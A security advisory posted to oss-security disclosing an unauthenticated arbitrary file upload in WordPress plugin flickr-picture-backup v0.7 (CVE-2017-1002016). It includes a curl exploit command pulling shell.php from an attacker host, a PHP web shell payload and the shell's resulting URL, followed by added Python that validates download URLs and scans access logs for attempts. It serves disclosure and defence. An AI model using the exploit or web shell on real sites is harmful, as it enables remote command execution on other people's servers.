Date: Sun, 30 Apr 2017 12:45:47 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Arbitrary file upload vulnerability in WordPress plugin flickr-picture-backup v0.7

Title: Arbitrary file upload vulnerability in WordPress plugin flickr-picture-backup v0.7
Author: Larry W. Cashdollar, @_larry0
Date: 2017-04-26
CVE-ID:[CVE-2017-1002016]
Download Site: https://wordpress.org/plugins/flickr-picture-backup/
Vendor: http://daozhao.goflytoday.com/
Vendor Notified: 2017-04-26
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=190
Description (from the plugin page): Backs up Flickr pictures that are linked externally from a page/post.
Vulnerability:
The code in flickr-picture-download.php doesn't check whether the requester is authenticated or has permission to upload files (no is_user_logged_in()/current_user_can() check and no nonce). It also doesn't restrict where the attacker-supplied url parameter may point or what type of file is fetched from it; whatever is downloaded is written under wp-content/uploads/flickr_backup/, where the web server will execute a .php file.

define('WP_ADMIN', TRUE);
require_once('../../../wp-load.php');
require_once(ABSPATH . 'wp-admin/includes/admin.php');
//require_once("./flickr-picture-backup.php");
//echo "flickr-picture-download.php";
// No authentication, capability or nonce check: anyone who can reach this file
// directly under wp-content/plugins/ can drive it.
if($_GET["url"])
{
    // The URL is used verbatim: no host allowlist and no file-type check before
    // the download is written under wp-content/uploads/flickr_backup/.
    $url = $_GET["url"];
    $fl = wp_daozhao_download_flickr_picture($url);
    if ( is_wp_error($fl) )
    {
        echo  "FALSE:" . $fl->get_error_message();
    }
    else
    {
        wp_daozhao_flickr_backupfile_exists($url,$returl);
        echo "OK:" . $returl ;
    }
    //echo wp_daozhao_flickr_backup_urlpath();
    //echo "OK";
}

Exploit Code:

$ curl -G --data-urlencode "url=http://myhost/shell.php" http://example.com/wp-content/plugins/flickr-picture-backup/flickr-picture-download.php

(The endpoint reads url from $_GET, so the parameter has to travel in the query string; a plain "curl -d" POST body would never reach it.)

Where shell.php is code to print out PHP web shell code, something like:

<?php
echo "<?php\n\$cmd=\$_GET['cmd'];\nsystem(\$cmd);\n?>\n";
?>

The attacker's host executes shell.php and serves only the echoed text, so what the plugin saves is the inner web shell.

Upon exploitation your shell is in:

http://example.com/wp-content/uploads/flickr_backup/shell.php
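As an added example (not the advisory's own code and not the plugin's), the following Python models the two checks the endpoint lacks, an origin and file-type gate on the url parameter, and reuses that same gate to flag exploitation attempts like the curl request above in a web-server access log. The Flickr host allowlist, the image-extension list, the endpoint and upload paths, and the log lines are assumptions constructed for the example; the gate also deliberately refuses any name containing ".php", since "shell.php.jpg" can still be executed by some Apache handler configurations.

```python
"""Added example: the missing validation for flickr-picture-download.php,
and a log scan that uses it to spot exploitation attempts."""
import re
from pathlib import PurePosixPath
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: the plugin only ever needs Flickr-hosted images, so a hardened
# endpoint should download from these hosts (and their subdomains) only.
ALLOWED_HOSTS = ("staticflickr.com", "flickr.com")
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def safe_backup_filename(url: str) -> Optional[str]:
    """Return the basename a backup may be stored under, or None to refuse.

    Enforces: https scheme, allowlisted host, a plain basename (path
    traversal components are dropped), an image extension, and no ".php"
    anywhere in the name.  The extension is attacker-controlled, so a real
    fix must also sniff the downloaded bytes (magic numbers) before saving.
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        return None
    host = (parts.hostname or "").lower()
    if not any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS):
        return None
    name = PurePosixPath(unquote(parts.path)).name
    if not name or name != re.sub(r"[^A-Za-z0-9._-]", "", name):
        return None
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXTENSIONS:
        return None
    if ".php" in name.lower() or ".pht" in name.lower():
        return None
    return name


# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [30/Apr/2017:12:45:47 -0400] "GET /wp-content/plugins/flickr-picture-backup/flickr-picture-download.php?url=http://myhost/shell.php HTTP/1.1" 200 53
198.51.100.9 - - [30/Apr/2017:12:46:01 -0400] "GET /wp-content/plugins/flickr-picture-backup/flickr-picture-download.php?url=https://live.staticflickr.com/65535/1234_abcd_b.jpg HTTP/1.1" 200 80
203.0.113.5 - - [30/Apr/2017:12:46:10 -0400] "GET /wp-content/uploads/flickr_backup/shell.php?cmd=id HTTP/1.1" 200 61
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/wp-content/plugins/flickr-picture-backup/flickr-picture-download.php"
BACKUP_DIR = "/wp-content/uploads/flickr_backup/"


def scan_access_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, reason, offending_value) for each suspicious request.

    Two signals: a download request whose url parameter would fail the gate
    above, and any request that executes a PHP file from the backup directory.
    Only GET query strings are visible here; POST bodies are not logged.
    """
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if path == ENDPOINT:
            for u in parse_qs(query).get("url", []):
                if safe_backup_filename(u) is None:
                    hits.append((m.group("ip"), "download of non-Flickr or non-image URL", u))
        elif path.startswith(BACKUP_DIR) and path.lower().endswith((".php", ".phtml", ".phar")):
            hits.append((m.group("ip"), "PHP executed from flickr_backup upload dir", path))
    return hits


if __name__ == "__main__":
    for ip, reason, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: {reason}: {value}")
```

Run it as-is to see the two sample hits; point scan_access_log at a real access log to look for the same pattern. Because the endpoint takes its parameter from $_GET, an exploitation attempt leaves the attacker's download URL in the query string, which is why this scan works on ordinary web-server logs.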
